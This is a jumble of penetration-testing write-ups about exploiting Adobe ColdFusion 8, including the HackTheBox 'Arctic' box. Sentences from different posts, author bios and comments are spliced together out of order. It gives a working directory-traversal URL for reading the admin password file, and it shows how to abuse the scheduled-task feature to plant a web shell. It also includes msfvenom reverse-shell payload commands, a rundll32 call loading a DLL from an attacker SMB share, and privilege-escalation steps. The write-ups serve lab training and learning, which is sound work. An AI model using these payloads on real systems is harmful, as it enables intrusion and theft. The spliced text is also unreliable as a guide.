I settled on looking into MS10-059. Tolis doesn't seem to be an administrator on the system, so we will need to escalate. The administrator directory gives us a login for ColdFusion 8. I recently helped out someone who was working on this box. Needed to checkbox the save to output file and give it a location and file name. There were also a few python scripts that were available to glean the same information. Now for the malicious file: I found the below site that had a good .CFM file (ColdFusion file). A quick Google search online yields the cracked password - happyday. And we can grab the user.txt flag on tolis's desktop.
Based on the source code it looks like the exploit will send us a reverse shell by feeding our IP address and desired port as parameters. Usually easiest to start here before firing up hashcat. In addition to the above information there was other data I was not sure what it was related to. The exact URL would vary based on the version of ColdFusion. From here you can either Google, use Exploit-DB, searchsploit, or for Windows I like to use something called Windows Exploit Suggester, which makes life easy. With my Kali box listening with Netcat on port 5555 I got myself a shell. If you're not finding it, you're probably not looking in the right places. To do this I basically did what I had done before, using rundll32.exe to call a file from my SMB share I created on my Kali box using Impacket. Based on past experience I needed to figure out a way to upload a file to hopefully get a shell, or at least get me the ability to run other commands or escalate privileges if I needed to. Below is the command I ran. As you can see in the picture above there is a directory traversal vulnerability (CVE-2010-2861) available on the device. This was interesting, but when I looked at the results from the vulnerability scan, port 80 (HTTP) was available running IIS 6 with ColdFusion 8. First, let's start with a quick nmap scan. Experienced Information Security Executive, Evangelist, Entrepreneur, and Mentor with over 20 years of experience. Note that normally you want to compile things yourself, but I wasn't able to do so without installing a ton of stuff, so I decided to forgo it.
HackTheBox - Arctic Writeup - absolomb

nmap -sT -A --top-ports=20 x.x.x.x-254 -oG top-port-sweep.txt
nmap -A -sV --script=default,vuln -p- --open -oA tcp_10.11.1.x 10.11.1.x
nmap -A -sV --script=default,vuln -p- --open -oA all-hosts 10.11.1.0/24

I used that password to get me into the admin page of ColdFusion, which is usually found at this link. So we can grab the administrator hash using the directory traversal with the following URL: http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en - so we have a hash of 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03. On a recent pentest I ran into a ColdFusion box that was a bit problematic to pwn.

arrayReverse (ColdFusion):
<cfloop index="i" from="#arrayLen(myArray)#" to="1" step="-1">
    <cfoutput>#myArray[i]#</cfoutput>
</cfloop>

pretty damn cool. How do I get to execute commands and what privilege was I? As a matter of fact, all top 20 ports seemed to be filtered. I moved to the browser and typed http://site/CFIDE/cfexec.cfm which gave me a web shell. Adobe ColdFusion Directory Traversal Vulnerability (multiple directory traversal vulnerabilities): Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary, https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/. After a quick search online we find that ColdFusion 8 is vulnerable to directory traversal: http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en. It's been about a month or two, so I figured I would write another one describing how I went from initially exploiting a directory traversal vulnerability to eventually getting shell access as SYSTEM on a Windows box running ColdFusion version 8.
For whatever reason the exploit has an alias name of Chimichurri, as referenced on Exploit-DB, so I also searched by that and was able to find a compiled exe on GitHub here. The next step is to get a command shell. I ran rundll32.exe \\10.x.x.x\smb\shell.dll,0. Ports: 21/filtered/tcp//ftp///, 22/filtered/tcp//ssh///, 23/filtered/tcp//telnet///, 25/filtered/tcp//smtp///, 53/filtered/tcp//domain///, 80/filtered/tcp//http///, 110/filtered/tcp//pop3///, 111/filtered/tcp//rpcbind///, 135/filtered/tcp//msrpc///, 139/filtered/tcp//netbios-ssn///, 143/filtered/tcp//imap///, 443/filtered/tcp//https///, 445/filtered/tcp//microsoft-ds///, 993/filtered/tcp//imaps///, 995/filtered/tcp//pop3s///, 1723/filtered/tcp//pptp///, 3306/filtered/tcp//mysql///, 3389/filtered/tcp//ms-wbt-server///, 5900/filtered/tcp//vnc///, 8080/filtered/tcp//http-proxy///. The other information I needed before I finished the task was in the file section. From here we identify the box is running Server 2008 R2 and also has no patches installed, according to the output under Hotfix(s).
Coldfusion - Pentest Come to find out there is a way to upload files and run them through the admin portal.
I mention this because when you get access to a hacking lab it's always a good idea to just run a full scan in the background as you plug away. At this point we need to generate a shell. I ran the command whoami to see what access I had. Apparently, the vulnerability gave you access to the contents of a password file, which I later found out was the information that was in the initial Nmap scan.

Couple more things: where is part 1? Also http://www.exploit-db.com/exploits/16985/ has the code to automagically exploit that directory traversal and schedule the task for you if the stars line up correctly.

After looking through the output I found a few privilege escalation exploits that could work.

https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html, https://pentest.tonyng.net/attacking-adobe-coldfusion/, https://www.exploit-db.com/exploits/14641/

http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/cfm/cfExec.cfm
/usr/share/webshells/cfm/cfexec.cfm (Kali)
Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Browse: http://$IP:8500/CFIDE/output.txt
You may be able to upload a reverse executable:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe
set payload windows/x64/meterpreter/reverse_tcp
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt
>> choose '24'.. Powershell/meterpreter/rev_tcp
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat
We use Nexpose and it doesn't even tell you that ColdFusion 7 or 8 is installed (yet another vuln scan fail). This gave me a file that contained all the vulnerability information that existed on all devices in that subnet block. When I browsed to the IP address, there was no default webpage set up. Let's see what exploits we can find. In his current position, he is focused on delivering knowledge, tools, and methodologies to properly demonstrate advanced threat concepts and defense strategy using a practical approach to security. I was lucky enough to already be system, which was cool. May need to try this 2-3 times.. but will work!! As a consultant, Anthony provided expertise in many areas including security program development, defensive strategies, incident response and forensics procedures, security assessments, penetration testing, and security operations. Inside of the login page there is an area that allows us to upload files via Scheduled Tasks under the Debugging & Logging category. Right off the bat port 8500 looks interesting. https://ultimatepeter.com/tutorial-coldfusion-exploit-hack-big-sites-with-ease/, http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf, https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/. Now that we have our shell created, let's serve up the file from Kali using a python SimpleHTTPServer.
Under Debugging and Logging there is an ability to schedule a task. So I decided to reorganize my notes, as they were somewhat of a mess, and restructure them for a proper writeup. Mr. Giandomenico founded and managed Secure DNA Inc., a global security consulting company focused on protecting critical infrastructures such as financial institutions, hospitals, and government agencies. Fire up a netcat listener and we can now browse to our shell at http://10.10.10.11:8500/CFIDE/shell.jsp.
You did part 1. I won't go into details on how to use it; check the GitHub to see usage and what all you can feed into it. Of course, I started off by running a port scan and vulnerability scan using Nmap.
ColdFusion for Pentesters Part 2 - pwnag3 This post should really be called "ColdFusion for Pentesters Part 1.15," but you get my drift. Once again we set up a python http server on Kali, and to download to our target a simple PowerShell script will do the trick.
Inside the ColdFusion admin console we configure three parameters for the scheduled task. ColdFusion 8 also stores the administrator hash locally in a file called password.properties. This is what needed to go into the file section along with the file name. To generate a JSP shell, we use msfvenom and set our parameters accordingly. Using hash-identifier we see the hash is most likely SHA-1. From the port scan, I didn't have much. To be honest though, what I really did was look at my results from the full nmap vulnerability scan I ran on all devices once I got access to the labs. This was the file name (cfexec.cfm) I gave in my task settings. The Exploit-DB download only contained source files and no compiled exe. After submitting we run the task on demand under Actions, and we can see the 200 response on our python http server. http://site/CFIDE/administrator/index.cfm. I see ColdFusion all the time on client engagements. So, I went to create a scheduled task. I will clarify that. Also, just realized by reading that sploit, that you don't even need to crack the pw, just use the hash! This hash was the password for the admin portal to ColdFusion. This would give me a webshell that would allow me to run commands.
Chris Gates gave a presentation in 2012 that I reference all the time, "ColdFusion for Pentesters": http://www.slideshare.net/chrisgates/coldfusion-for-penetration-testers, http://code.google.com/p/fuzzdb/source/browse/trunk/web-backdoors/cfm/cfExec.cfm?r=180. Privileges already escalated. Once I had the password hash, I found an online password cracker, https://crackstation.net/, and found out the password. From here we're able to grab the root.txt flag on the Administrator desktop. Let's have a look in the browser. As I continue my OSCP journey I have popped a few more boxes since my last blog. To create the shell file, I used msfvenom, which would provide me a reverse shell on port 5555: msfvenom -p windows/shell_reverse_tcp -f dll LHOST=10.x.x.x LPORT=5555 > ./shell.dll. Under Mappings, we can verify the CFIDE path, so we know where we can save a shell. He has presented, trained and mentored various security concepts and strategies at many conferences, trade shows and media outlets, including a weekly appearance on KHON2-TV morning news Tech Buzz segment and Technology News Bytes on OC16, providing monthly security advice. I was looking for the directory path for /CFIDE, which in this case was C:\Inetpub\wwwroot\CFIDE. Great! Then in the URL section I added my website with the file I eventually wanted to upload and run. After doing some basic Google searching I came across the following websites that helped put into perspective what I was able to do with the initial vulnerability, as well as what else I could do for ultimately a command shell. Of course, I needed to make sure I had my website running, and I had to find a good malicious file to use to give me a webshell.
For the location I needed to find out the default mappings, so I went to the mappings section on the server settings in the portal.
A Walk Down Adversary Lane - ColdFusion V8 - Drchaos Once complete I needed to create the task and start it. You could run the following code on the browser to get the same information I had in the scan. One of the first things I do for privilege escalation on Windows is grab system information, so that we can identify the OS and also see if it's missing any patches. We verify the download, start a netcat listener, and run the exploit. Set the URL to our webserver hosting the JSP shell; set File to C:\ColdFusion8\wwwroot\CFIDE\shell.jsp. The scheduled task setup gives you the ability to download a file from a webserver and save the output locally. I did this box quite some time ago, as it was one of the first ones I did when first starting HackTheBox. https://www.exploit-db.com/exploits/14610/. I didn't know about the code analyzer stuff to view files. Thanks for reading! I first had to give it a task name, which could be anything. We could upload a cfexec.cfm shell (located in /usr/share/webshells/cfm on Kali) to get command execution, or we can get a full shell by uploading a JSP shell, since ColdFusion will serve and run JSP files. Getting into an admin portal was cool but of course, I wanted more. Back to that in a bit.